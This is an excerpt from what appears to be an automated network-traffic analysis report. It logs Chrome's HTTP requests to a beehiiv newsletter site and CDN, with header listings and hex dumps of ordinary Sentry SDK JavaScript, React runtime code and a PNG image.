                                                                                                                                            2025-01-15 18:14:33 UTC454INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 63 66 65 65 64 34 30 2d 61 35 64 35 2d 35 31 34 64 2d 62 34 64 39 2d 38 30 62 66 31 65 61 35 39 39 61 35 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dcfeed40-a5d5-514d-b4d9-80bf1ea599a5")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 45 20 61 73 20 68 74 2c 46 20 61 73 20 6f 65 2c 48 20 61 73 20 53 72 2c 72 20 61 73 20 61 74 2c 64 20 61 73 20 67 74 2c 6e 20 61 73 20 49 73 2c 49 20 61 73 20 79 72 2c 65 20 61 73 20 46 2c 66 20 61 73 20 55 2c 4a 20 61 73 20 53 2c 4b 20 61 73 20 24 74 2c 61 20 61 73 20 54 2c 75 20 61 73 20 6e 74 2c 54 20 61 73 20 54 72 2c 73 20 61 73 20 62 2c 4c 20 61 73 20 66 65 2c 4d 20 61 73 20 79 74 2c 4e 20 61 73 20 65 6e 2c 4f 20 61 73 20 6e 6e 2c 50 20 61 73 20 4f 2c 51 20 61 73 20 69 65 2c 52 20 61 73 20 52 73 2c 55 20 61 73 20 6b 74 2c 56 20 61 73 20 77 73 2c 57 20 61 73 20 52 6e 2c 58 20 61 73 20 4e 73 2c 59 20 61 73 20 76 72 2c 6d 20 61 73 20 78 2c 5a 20 61 73 20 5a 74 2c 53 20 61 73 20 4a 2c 5f 20 61 73 20 41 73 2c 71 20 61 73 20 54 74 2c 24 20 61 73 20 62 72
                                                                                                                                            Data Ascii: E as ht,F as oe,H as Sr,r as at,d as gt,n as Is,I as yr,e as F,f as U,J as S,K as $t,a as T,u as nt,T as Tr,s as b,L as fe,M as yt,N as en,O as nn,P as O,Q as ie,R as Rs,U as kt,V as ws,W as Rn,X as Ns,Y as vr,m as x,Z as Zt,S as J,_ as As,q as Tt,$ as br
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 2c 65 2c 6e 2c 75 2c 73 2c 5b 6c 2c 2e 2e 2e 63 5d 2c 6c 2c 45 29 7d 7d 29 2c 63 7d 66 75 6e 63 74 69 6f 6e 20 46 6e 28 74 2c 65 29 7b 74 2e 6d 65 63 68 61 6e 69 73 6d 3d 74 2e 6d 65 63 68 61 6e 69 73 6d 7c 7c 7b 74 79 70 65 3a 22 67 65 6e 65 72 69 63 22 2c 68 61 6e 64 6c 65 64 3a 21 30 7d 2c 74 2e 6d 65 63 68 61 6e 69 73 6d 3d 7b 2e 2e 2e 74 2e 6d 65 63 68 61 6e 69 73 6d 2c 2e 2e 2e 74 2e 74 79 70 65 3d 3d 3d 22 41 67 67 72 65 67 61 74 65 45 72 72 6f 72 22 26 26 7b 69 73 5f 65 78 63 65 70 74 69 6f 6e 5f 67 72 6f 75 70 3a 21 30 7d 2c 65 78 63 65 70 74 69 6f 6e 5f 69 64 3a 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 4d 6e 28 74 2c 65 2c 6e 2c 72 29 7b 74 2e 6d 65 63 68 61 6e 69 73 6d 3d 74 2e 6d 65 63 68 61 6e 69 73 6d 7c 7c 7b 74 79 70 65 3a 22 67 65 6e 65 72 69
                                                                                                                                            Data Ascii: ,e,n,u,s,[l,...c],l,E)}}),c}function Fn(t,e){t.mechanism=t.mechanism||{type:"generic",handled:!0},t.mechanism={...t.mechanism,...t.type==="AggregateError"&&{is_exception_group:!0},exception_id:e}}function Mn(t,e,n,r){t.mechanism=t.mechanism||{type:"generi
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 20 6d 69 73 73 69 6e 67 60 29 2c 21 30 29 29 3f 21 31 3a 6e 2e 6d 61 74 63 68 28 2f 5e 5c 64 2b 24 2f 29 3f 4a 73 28 72 29 3f 65 26 26 69 73 4e 61 4e 28 70 61 72 73 65 49 6e 74 28 65 2c 31 30 29 29 3f 28 66 2e 65 72 72 6f 72 28 60 49 6e 76 61 6c 69 64 20 53 65 6e 74 72 79 20 44 73 6e 3a 20 49 6e 76 61 6c 69 64 20 70 6f 72 74 20 24 7b 65 7d 60 29 2c 21 31 29 3a 21 30 3a 28 66 2e 65 72 72 6f 72 28 60 49 6e 76 61 6c 69 64 20 53 65 6e 74 72 79 20 44 73 6e 3a 20 49 6e 76 61 6c 69 64 20 70 72 6f 74 6f 63 6f 6c 20 24 7b 72 7d 60 29 2c 21 31 29 3a 28 66 2e 65 72 72 6f 72 28 60 49 6e 76 61 6c 69 64 20 53 65 6e 74 72 79 20 44 73 6e 3a 20 49 6e 76 61 6c 69 64 20 70 72 6f 6a 65 63 74 49 64 20 24 7b 6e 7d 60 29 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 24 72 28 74 29
                                                                                                                                            Data Ascii: missing`),!0))?!1:n.match(/^\d+$/)?Js(r)?e&&isNaN(parseInt(e,10))?(f.error(`Invalid Sentry Dsn: Invalid port ${e}`),!1):!0:(f.error(`Invalid Sentry Dsn: Invalid protocol ${r}`),!1):(f.error(`Invalid Sentry Dsn: Invalid projectId ${n}`),!1)}function $r(t)
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 74 20 74 3d 21 31 3b 63 6f 6e 73 74 20 65 3d 4c 65 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 65 26 26 74 79 70 65 6f 66 20 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 72 79 7b 63 6f 6e 73 74 20 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 6e 2e 68 69 64 64 65 6e 3d 21 30 2c 65 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 6e 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 26 26 6e 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 26 26 28 74 3d 48 65 28 6e 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 66 65 74 63 68 29 29 2c 65 2e 68 65 61 64 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6e 29 7d 63 61 74 63 68 28 6e 29 7b 51 65 26 26 66 2e 77 61 72 6e 28 22 43 6f
                                                                                                                                            Data Ascii: t t=!1;const e=Le.document;if(e&&typeof e.createElement=="function")try{const n=e.createElement("iframe");n.hidden=!0,e.head.appendChild(n),n.contentWindow&&n.contentWindow.fetch&&(t=He(n.contentWindow.fetch)),e.head.removeChild(n)}catch(n){Qe&&f.warn("Co
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6e 3a 72 2c 65 72 72 6f 72 3a 73 2c 6c 69 6e 65 3a 6e 2c 6d 73 67 3a 74 2c 75 72 6c 3a 65 7d 29 2c 47 74 26 26 21 47 74 2e 5f 5f 53 45 4e 54 52 59 5f 4c 4f 41 44 45 52 5f 5f 3f 47 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3a 21 31 7d 2c 52 2e 6f 6e 65 72 72 6f 72 2e 5f 5f 53 45 4e 54 52 59 5f 49 4e 53 54 52 55 4d 45 4e 54 45 44 5f 5f 3d 21 30 7d 6c 65 74 20 57 74 3d 6e 75 6c 6c 3b 66 75 6e 63 74 69 6f 6e 20 4c 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 3b 75 74 28 65 2c 74 29 2c 64 74 28 65 2c 69 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 69 6f 28 29 7b 57 74 3d 52 2e 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 2c 52 2e 6f 6e 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65
                                                                                                                                            Data Ascii: n:r,error:s,line:n,msg:t,url:e}),Gt&&!Gt.__SENTRY_LOADER__?Gt.apply(this,arguments):!1},R.onerror.__SENTRY_INSTRUMENTED__=!0}let Wt=null;function Lr(t){const e="unhandledrejection";ut(e,t),dt(e,io)}function io(){Wt=R.onunhandledrejection,R.onunhandledreje
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 61 74 69 76 65 3a 65 5b 35 5d 2b 6e 2b 72 7d 7d 63 6f 6e 73 74 20 66 6f 3d 5b 22 66 61 74 61 6c 22 2c 22 65 72 72 6f 72 22 2c 22 77 61 72 6e 69 6e 67 22 2c 22 6c 6f 67 22 2c 22 69 6e 66 6f 22 2c 22 64 65 62 75 67 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 22 77 61 72 6e 22 3f 22 77 61 72 6e 69 6e 67 22 3a 66 6f 2e 69 6e 63 6c 75 64 65 73 28 74 29 3f 74 3a 22 6c 6f 67 22 7d 66 75 6e 63 74 69 6f 6e 20 62 74 28 74 2c 65 3d 5b 5d 29 7b 72 65 74 75 72 6e 5b 74 2c 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 6d 6f 28 74 2c 65 29 7b 63 6f 6e 73 74 5b 6e 2c 72 5d 3d 74 3b 72 65 74 75 72 6e 5b 6e 2c 5b 2e 2e 2e 72 2c 65 5d 5d 7d 66 75 6e 63 74 69 6f 6e 20 55 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 74 5b 31 5d 3b 66 6f 72 28
                                                                                                                                            Data Ascii: ative:e[5]+n+r}}const fo=["fatal","error","warning","log","info","debug"];function po(t){return t==="warn"?"warning":fo.includes(t)?t:"log"}function bt(t,e=[]){return[t,e]}function mo(t,e){const[n,r]=t;return[n,[...r,e]]}function Un(t,e){const n=t[1];for(
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 6c 65 22 2c 72 65 70 6c 61 79 5f 65 76 65 6e 74 3a 22 72 65 70 6c 61 79 22 2c 72 65 70 6c 61 79 5f 72 65 63 6f 72 64 69 6e 67 3a 22 72 65 70 6c 61 79 22 2c 63 68 65 63 6b 5f 69 6e 3a 22 6d 6f 6e 69 74 6f 72 22 2c 66 65 65 64 62 61 63 6b 3a 22 66 65 65 64 62 61 63 6b 22 2c 73 70 61 6e 3a 22 73 70 61 6e 22 2c 73 74 61 74 73 64 3a 22 6d 65 74 72 69 63 5f 62 75 63 6b 65 74 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 42 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 6f 5b 74 5d 7d 66 75 6e 63 74 69 6f 6e 20 48 72 28 74 29 7b 69 66 28 21 74 7c 7c 21 74 2e 73 64 6b 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 7b 6e 61 6d 65 3a 65 2c 76 65 72 73 69 6f 6e 3a 6e 7d 3d 74 2e 73 64 6b 3b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 65 2c 76 65 72 73 69 6f 6e 3a 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                            Data Ascii: le",replay_event:"replay",replay_recording:"replay",check_in:"monitor",feedback:"feedback",span:"span",statsd:"metric_bucket"};function Bn(t){return So[t]}function Hr(t){if(!t||!t.sdk)return;const{name:e,version:n}=t.sdk;return{name:e,version:n}}function
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 72 65 74 75 72 6e 3b 73 3d 3d 3d 22 61 63 63 65 73 73 22 7c 7c 73 3d 3d 3d 22 6f 70 74 69 6f 6e 61 6c 41 63 63 65 73 73 22 3f 28 65 3d 6e 2c 6e 3d 6f 28 6e 29 29 3a 28 73 3d 3d 3d 22 63 61 6c 6c 22 7c 7c 73 3d 3d 3d 22 6f 70 74 69 6f 6e 61 6c 43 61 6c 6c 22 29 26 26 28 6e 3d 6f 28 28 2e 2e 2e 69 29 3d 3e 6e 2e 63 61 6c 6c 28 65 2c 2e 2e 2e 69 29 29 2c 65 3d 76 6f 69 64 20 30 29 7d 72 65 74 75 72 6e 20 6e 7d 63 6f 6e 73 74 20 59 74 3d 52 3b 66 75 6e 63 74 69 6f 6e 20 4e 6f 28 29 7b 63 6f 6e 73 74 20 74 3d 59 74 2e 63 68 72 6f 6d 65 2c 65 3d 74 26 26 74 2e 61 70 70 26 26 74 2e 61 70 70 2e 72 75 6e 74 69 6d 65 2c 6e 3d 22 68 69 73 74 6f 72 79 22 69 6e 20 59 74 26 26 21 21 59 74 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 26 26 21 21 59 74 2e 68 69
                                                                                                                                            Data Ascii: return;s==="access"||s==="optionalAccess"?(e=n,n=o(n)):(s==="call"||s==="optionalCall")&&(n=o((...i)=>n.call(e,...i)),e=void 0)}return n}const Yt=R;function No(){const t=Yt.chrome,e=t&&t.app&&t.app.runtime,n="history"in Yt&&!!Yt.history.pushState&&!!Yt.hi
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 62 28 74 29 2c 7b 73 70 61 6e 49 64 3a 73 7d 3d 74 2e 73 70 61 6e 43 6f 6e 74 65 78 74 28 29 2c 6f 3d 66 65 28 74 29 2c 69 3d 55 28 74 29 2c 61 3d 69 3d 3d 3d 74 2c 63 3d 60 5b 54 72 61 63 69 6e 67 5d 20 53 74 61 72 74 69 6e 67 20 24 7b 6f 3f 22 73 61 6d 70 6c 65 64 22 3a 22 75 6e 73 61 6d 70 6c 65 64 22 7d 20 24 7b 61 3f 22 72 6f 6f 74 20 22 3a 22 22 7d 73 70 61 6e 60 2c 75 3d 5b 60 6f 70 3a 20 24 7b 6e 7d 60 2c 60 6e 61 6d 65 3a 20 24 7b 65 7d 60 2c 60 49 44 3a 20 24 7b 73 7d 60 5d 3b 69 66 28 72 26 26 75 2e 70 75 73 68 28 60 70 61 72 65 6e 74 20 49 44 3a 20 24 7b 72 7d 60 29 2c 21 61 29 7b 63 6f 6e 73 74 7b 6f 70 3a 64 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 6c 7d 3d 62 28 69 29 3b 75 2e 70 75 73 68 28 60 72 6f 6f 74 20 49 44 3a 20 24 7b 69 2e 73 70 61
                                                                                                                                            Data Ascii: b(t),{spanId:s}=t.spanContext(),o=fe(t),i=U(t),a=i===t,c=`[Tracing] Starting ${o?"sampled":"unsampled"} ${a?"root ":""}span`,u=[`op: ${n}`,`name: ${e}`,`ID: ${s}`];if(r&&u.push(`parent ID: ${r}`),!a){const{op:d,description:l}=b(i);u.push(`root ID: ${i.spa


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.1649725104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC556OUTGET /assets/jsx-runtime-BjG_zV1W.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC897INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1001
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3e9-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d898f9aac332-EWR
                                                                                                                                            2025-01-15 18:14:33 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 63 33 35 38 66 63 65 34 2d 34 32 33 30 2d 35 38 31 65 2d 38 35 32 62 2d 37 30 62 38 36 39 61 39 39 36 62 66 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c358fce4-4230-581e-852b-70b869a996bf")}catch(
                                                                                                                                            2025-01-15 18:14:33 UTC529INData Raw: 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 76 61 72 20 45 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 65 6c 65 6d 65 6e 74 22 29 2c 6e 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 66 72 61 67 6d 65 6e 74 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 76 2c 72 2c 74 29 7b 76 61 72 20 65 3d 6e 75 6c 6c 3b 69 66 28 74 21 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 22 22 2b 74 29 2c 72 2e 6b 65 79 21 3d 3d 76 6f 69 64 20 30 26 26 28 65 3d 22 22 2b 72 2e 6b 65 79 29 2c 22 6b 65 79 22 69 6e 20 72 29 7b 74 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 78 20 69 6e 20 72 29 78 21
                                                                                                                                            Data Ascii: * LICENSE file in the root directory of this source tree. */var E=Symbol.for("react.transitional.element"),n=Symbol.for("react.fragment");function l(v,r,t){var e=null;if(t!==void 0&&(e=""+t),r.key!==void 0&&(e=""+r.key),"key"in r){t={};for(var x in r)x!


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.1649726104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:33 UTC614OUTGET /cdn-cgi/image/fit=scale-down,format=auto,onerror=redirect,quality=80/static_assets/defaults/thumb_logo.png HTTP/1.1
                                                                                                                                            Host: media.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:33 UTC632INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:33 GMT
                                                                                                                                            Content-Type: image/png
                                                                                                                                            Content-Length: 9057
                                                                                                                                            Connection: close
                                                                                                                                            CF-Ray: 9027d8992a5f420b-EWR
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            ETag: "cfj4p9oYe6TpWjrhZC3_iYLAuv09mqEZPVbCX5DjNtDQ:2212cd9a9592977b37ab77c4fba45408"
                                                                                                                                            Last-Modified: Wed, 16 Nov 2022 19:51:18 GMT
                                                                                                                                            Vary: Accept
                                                                                                                                            cf-bgj: imgq:100,h2pri
                                                                                                                                            cf-resized: internal=ram/m q=0 n=0+30 c=1+29 v=2024.12.1 l=9057 f=false
                                                                                                                                            content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                            priority: u=4;i=?0,cf-chb=(37;u=2;i=?0 630;u=5;i=?0)
                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                            Server: cloudflare
                                                                                                                                            2025-01-15 18:14:33 UTC737INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 20 00 00 03 20 08 03 00 00 00 ec ae f6 5a 00 00 02 3d 50 4c 54 45 e7 e8 ea 9c a2 ae 9b a3 ae e8 e8 ea 9d a3 af 9c a4 af a5 ac b6 ad b4 bc b0 b4 bf a4 ab b5 e7 e8 ec e6 e7 e9 b6 bd c5 b8 bc c5 9c a2 b0 de df e3 9b a3 b0 e8 e7 ec e8 e9 eb a0 a6 b2 e7 e7 e9 cb ce d3 9d a3 b1 e3 e4 e6 9c a4 b1 c1 c6 cc a5 ab b7 e3 e4 e8 b9 bd c6 a1 a7 b3 df e0 e4 e9 e9 eb ca cd d2 e6 e7 eb e7 e9 e8 d3 d6 db cf d2 d7 bd c2 c8 d4 d7 dc c2 c5 cc a6 ad b7 ad b4 be aa b1 bb af b3 bc af b3 be 9b a1 ad bc c1 c7 d4 d8 db a9 b0 ba a4 aa b6 a7 ab b6 dc e0 e3 b4 b8 c3 9b a4 ad cb ce d5 ab af ba e2 e3 e7 9f a7 b2 bd c1 ca b4 b8 c1 c0 c5 cb c5 ca d0 d8 db e0 ac b0 bb c7 ca d1 9c a3 ad c1 c4 cb c6 c9 d0 a6 ac b8 c1 c5 ce b0 b4 bd da
                                                                                                                                            Data Ascii: PNGIHDR Z=PLTE
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 8a a1 52 d9 e0 96 3f 9b c0 ff eb 7a 65 b3 bf 5c e5 e1 77 65 f2 d9 9f 81 45 96 cf fe 69 4c 7e 9b ff b2 b6 1f 15 be 6d fc a7 01 35 ca 67 4d 87 31 ab 8d fd 84 5b be 33 46 65 83 c1 27 fe f7 c0 42 c8 b2
                                                                                                                                            Data Ascii: R?ze\weEiL~m5gM1[3Fe'B
                                                                                                                                            2025-01-15 18:14:33 UTC1187INData Raw: 2e 75 d4 62 38 ec ce 4d 8a b7 e7 27 1b 7a 7e c3 fb 30 27 3e 50 8f 4f 55 75 2b 89 66 c4 9f bd 95 d7 14 79 a2 51 83 ea 33 76 73 56 b7 ba 1f 20 32 cb 3d f5 90 22 3c 50 03 13 ce df 1d 9d ce ea 57 e7 23 64 37 1b d6 59 bf fd 52 0d d9 b4 88 f9 84 00 51 2b 21 a1 99 ed 7e 7c 84 e3 5e 21 42 36 15 77 37 a0 0e 7e 2a 74 a3 aa 5d dd 8f 8f 70 4f d6 55 29 ac fc 8d 50 36 22 04 73 f2 75 e8 73 e7 62 d7 eb da 95 0f 98 90 c8 1a 98 8b 9f 09 1d 7e 29 81 a6 e3 c3 ae d3 78 a0 0e be 1e 9d 8f 5d 9b 9b 30 61 08 82 7a 98 53 b1 2b 73 13 be 17 fb 6d 45 22 86 f9 28 76 65 6e 80 7d 2c f6 fb 8a 14 f8 61 ec e7 d3 38 8b fe a7 f9 8b ac d9 aa 88 79 f9 00 39 22 ba fb db dc 3f 44 e4 cb 4a 29 12 4e 61 4e 43 35 50 cf 89 74 26 a3 d4 9d 12 bd a1 4c ce f5 26 98 93 51 c6 3c 9d c0 41 c2 8f 10 c9 58 26
                                                                                                                                            Data Ascii: .ub8M'z~0'>POUu+fyQ3vsV 2="<PW#d7YRQ+!~|^!B6w7~*t]pOU)P6"susb~)x]0azS+smE"(ven},a8y9"?DJ)NaNC5Pt&L&Q<AX&
                                                                                                                                            2025-01-15 18:14:33 UTC1369INData Raw: 37 ca 0c 68 42 92 f3 ba df 69 f7 bf b5 68 e7 db 8f 29 01 72 b7 fc aa aa ef 67 5d f3 b3 1d 39 01 92 9a 4c 1d 50 df 1c ed f6 ad 68 41 ee 9e 5f 33 d2 57 b5 5e 33 6c 39 49 c9 6a ae 06 26 57 af 2b 75 e5 12 61 31 bf 72 f4 88 3f 34 10 fb b1 a2 2e 66 98 55 1f 77 93 fd ba b0 84 c8 bc 44 6f f4 63 3f 53 d4 aa 5a dc 32 2b 7e 5f 51 19 bb 7e 75 9d 68 57 9e 8d fd 44 51 9f d9 d2 6f ae 9e 0c 73 57 04 c8 9c a4 10 71 8f c5 7e aa a8 99 31 57 46 a5 58 61 47 fb dc 4a bf bb f7 82 3f 7c cb e6 f7 14 cc ce 7f a8 7d d6 3f 58 5d c4 ae 5f 9d 27 e5 39 5d 7e 9b e8 48 8a c9 df 29 b4 58 02 a4 06 d5 0c f9 89 9c 4b 4e d2 91 99 7e 4f 3b 2d ac 7f cc 4f 4a bf 6d 51 8f 26 39 6d 48 3a cc 3a 81 51 b3 4f fb d9 0f 16 d4 13 e0 9f 61 ff af c6 ae 4f e9 e9 cf 36 f6 a2 e3 fc 63 fc 0d 86 1e 75 93 5f 32
                                                                                                                                            Data Ascii: 7hBih)rg]9LPhA_3W^3l9Ij&W+ua1r?4.fUwDoc?SZ2+~_Q~uhWDQosWq~1WFXaGJ?|}?X]_'9]~H)XKN~O;-OJmQ&9mH::QOaO6cu_2
